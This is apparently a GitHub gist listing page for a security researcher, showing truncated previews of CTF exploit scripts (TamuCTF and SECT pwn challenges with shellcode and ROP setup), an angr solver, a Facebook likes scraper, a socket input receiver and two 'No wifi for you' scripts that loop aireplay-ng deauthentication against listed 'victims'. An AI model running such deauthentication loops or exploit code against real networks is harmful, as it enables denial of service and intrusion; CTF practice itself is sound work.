Aneesh Dogra lionaneesh

🎯

Focusing

Hacker | Security Researcher | Working on SIEM tools and monitoring for security events at scale

lionaneesh / tamu_pwn5.py

Created February 26, 2018 15:54

TamuCTF 2018, Pwn5

	from pwn import *

	e = ELF('./pwn5')
	first_name_addr = 0x080F1A20
	last_name_addr = 0x080F1A9F
	exit = e.symbols['exit']
	def get_rop():
	#!/usr/bin/env python
	# Generated by ropper ropchain generator #
	from struct import pack

lionaneesh / pwn_bank_sect2017.py

Last active September 16, 2017 09:43

	from pwn import *
	import subprocess
	context(arch='amd64', os='linux', log_level='info')
	name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
	def get_treasure(r):
	#pass login and leak rand.
	print r.recvuntil("Username: ")
	r.send(name_payload) # 8 characters of input, 1 byte overflow.
	a = r.recvuntil('#> ')
	print a

lionaneesh / gdb_bank_sect2017.py

Created September 16, 2017 09:12

	import gdb
	import sys
	import os

	class MyBreakpoint(gdb.Breakpoint):
	def stop (self):
	return True

	gdb.execute('file ./bank_patched')
	MyBreakpoint("*0x555555554c56")

lionaneesh / katy_csaw_2016_solution.py

Created November 13, 2016 11:41

lionaneesh / cookie_math_solution_angr.py

Created November 13, 2016 10:46

	#!/usr/bin/env python2
	import angr # angr-5.6.8.22
	import simuvex
	import logging

	class __printf_chk(simuvex.SimProcedure):
	def run(self):
	print 'useless'

	p = angr.Project("./packer-release", load_options={'auto_load_libs': False})

lionaneesh / get_list_of_likes.py

Created September 19, 2015 16:49

Get a list of likes for any facebook post. Ref: http://anee.me/facebook-likes/

	import requests
	import json

	post_id = <POST_ID>
	access_token = "<ACCESS_TOKEN>"
	template = "https://graph.facebook.com/v2.4/%d?fields=likes&access_token=%s"
	url = template % (post_id, access_token,)
	likes = []
	first = True
	while 1:

lionaneesh / receiver.py

Created June 20, 2015 21:53

Shhh!

	import time

	import uinput

	import socket
	import sys

	from thread import *
	HOST = '' # Symbolic name, meaning all available interfaces
	PORT = 9123 # Arbitrary non-privileged port

lionaneesh / noWifiForYouAll.sh

Last active August 29, 2015 14:20

No wifi for you all

	FILE="mypacket.csv-01.csv"

	while :
	do
	for i in `cat victims-01.csv \| awk '/Station MAC/{y=1;next;}y' \| sed 's/, /,/g' \| awk -F "," '/1/ {print $1 "\|" $6}' \| grep -v "(not associated)"`:
	do
	ACCESS_POINT=`echo "${i::35}" \| awk -F "\|" '{print $2}'`
	DEVICE_P=`echo "${i::35}" \| awk -F "\|" '{print $1}'`
	COUNTER=0
	while [ $COUNTER -lt 40 ]; do

lionaneesh / noWifiForYou.sh

Created April 29, 2015 04:54

No wifi for you

	ACCESS_POINT="C4:0A:CB:2D:81:B4"
	DEVICE_POINT="A4:DB:30:D9:55:14"

	while :
	do
	sudo aireplay-ng -0 1 -a "$ACCESS_POINT" -c "$DEVICE_POINT" mon0 --ignore-negative-one;
	sleep 1
	done